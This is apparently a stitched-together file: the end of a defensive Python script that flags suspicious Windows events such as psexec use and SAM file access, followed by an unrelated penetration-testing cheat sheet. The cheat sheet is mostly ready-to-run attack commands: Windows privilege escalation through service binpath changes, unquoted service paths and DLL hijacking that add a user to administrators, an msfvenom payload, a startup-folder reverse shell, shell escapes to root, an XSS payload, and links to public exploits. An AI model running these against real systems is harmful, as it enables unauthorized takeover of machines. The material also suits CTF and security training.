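2024-05-01T10:04:00Z,4663,ObjectName=C:\\Windows\\System32\\config\\SAM,AccessMask=0x1
"""

# Process names the notes above call out (psexesvc.exe is what psexec installs).
SUSPICIOUS_EXES = {"cscript.exe", "sysprep.exe", "psexec.exe", "psexesvc.exe"}
# Credential stores whose file access (4663) is worth an alert on its own.
CREDENTIAL_FILES = {"sam", "system", "ntds.dit"}
# Assumed internal ranges; a real deployment would use its own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def parse_events(text):
    """Turn the sample format into dicts with 'time', 'id' and the key=value fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, *kvs = line.split(",")
        fields = dict(kv.split("=", 1) for kv in kvs)
        events.append({"time": ts, "id": int(eid), **fields})
    return events


def basename(path):
    """Last component of a Windows or NT device path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_external(addr):
    ip = ipaddress.ip_address(addr)
    return not any(ip in net for net in INTERNAL_NETS)


def triage(events):
    """Apply the event-ID rules from the notes; returns (time, id, reason) tuples."""
    alerts = []
    for e in events:
        eid = e["id"]
        if eid == 4688 and basename(e.get("NewProcessName", "")) in SUSPICIOUS_EXES:
            alerts.append((e["time"], eid, "suspicious process: " + basename(e["NewProcessName"])))
        elif eid == 5140 and e.get("ShareName", "").upper().endswith("C$"):
            alerts.append((e["time"], eid, "admin share C$ accessed by " + e.get("SubjectUserName", "?")))
        elif eid == 7045:   # any new service outside patch windows is worth a look
            alerts.append((e["time"], eid, "new service installed: " + e.get("ServiceName", "?")))
        elif eid == 5156 and is_external(e.get("DestAddress", "127.0.0.1")):
            alerts.append((e["time"], eid, "external connection by " + basename(e.get("Application", ""))))
        elif eid == 4663 and basename(e.get("ObjectName", "")) in CREDENTIAL_FILES:
            alerts.append((e["time"], eid, "credential store accessed: " + basename(e["ObjectName"])))
    return alerts
```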
- Restricted shell escape (see the Escape from Shellcatraz deck):
https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=7
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/sh
- Tunnel a service running on port 10000 on the victim machine to localhost on the same port.
- Specify the compromised user's name and password.
ssh -L 10000:localhost:10000 username@<remote IP>
wmic qfe
wmic logicaldisk get caption,description,providername
powershell -ep bypass
nano /etc/samba/smb.conf
min protocol = SMB2 (add this line)
client min protocol = LANMAN1 (or add this line)
/etc/init.d/smbd restart
powershell -command "start-process priv1.exe -Credential (New-Object System.Management.Automation.PSCredential 'username',(ConvertTo-SecureString 'password' -AsPlainText -Force))"
<script>alert('site is vulnerable to xss!')</script>
- Include 10 lines of context above and below the search term using grep
grep -C 10 <term> <file>
- Tmux (attach using a specific socket file)
tmux -S /.devs/dev_sess
- Check privileges of current shell
id
- Find a particular file
locate <filename>
- Vi commands
Insert a line at the end of the file: Esc, then G, then o
Write changes and exit: Esc, then :wq
- Cat equivalent in Windows
more
- List all files in Windows
dir /aihd
- list files in current directory
Get-ChildItem
gci
ls
- View services
Get-Service
- Object which is populated with the current item in the pipeline.
$_
- Example of using $_
Get-Service | Where-Object {$_.DisplayName -match "MS"}
- Current running processes
Get-Process
- Runas
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"
- Autoruns
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
- AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- registry
#Enumerate
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
#Add the exe to the service
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
- Executable files
#Identifying via access check
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
#Exploit: copy the malicious exe to the location of the vulnerable service
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
net localgroup administrators
- Startup Applications
#Identify whether the user has permissions: the "BUILTIN\Users" group has full access (F) to the directory
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Generate a malicious exe using msfvenom and copy it to:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
#When a user logs in/restarts we get a reverse shell
- DLL Hijacking
# Scenario assumes we have discovered a DLL hijack vulnerability
# edit our dll file to add the user "user" to the admin group
windows_dll.c
# compile
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
# serve up to target and save in temp folder
# restart the service
sc start dllsvc
- Service Permission Paths
# running accesscheck
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc Everyone *
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
# Exploit
sc qc daclsvc
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
# may get error as we have removed the original exe but exploit worked
- Unquoted Service Paths
# identify the vulnerability using PowerUp
sc qc unquotedsvc
#Exploit
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
1. Place common.exe in 'C:\Program Files\Unquoted Path Service'.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
- Drupal Exploit
https://github.com/dreadlocked/Drupalgeddon2
https://github.com/pimps/CVE-2018-7600
- MS10-059
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
#usage: MS10-059.exe 10.10.14.38 5555
- Check for intended path on CTF's
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
- Spawn a TTY when we have sudo permissions on a program, for escalation
python -c 'import pty; pty.spawn("/bin/sh")'
$ sudo /home/anansi/bin/anansi_util manual ifconfig
sudo /home/anansi/bin/anansi_util manual ifconfig
No manual entry for manual
WARNING: terminal is not fully functional
- (press RETURN)
!/bin/sh
# whoami
whoami
root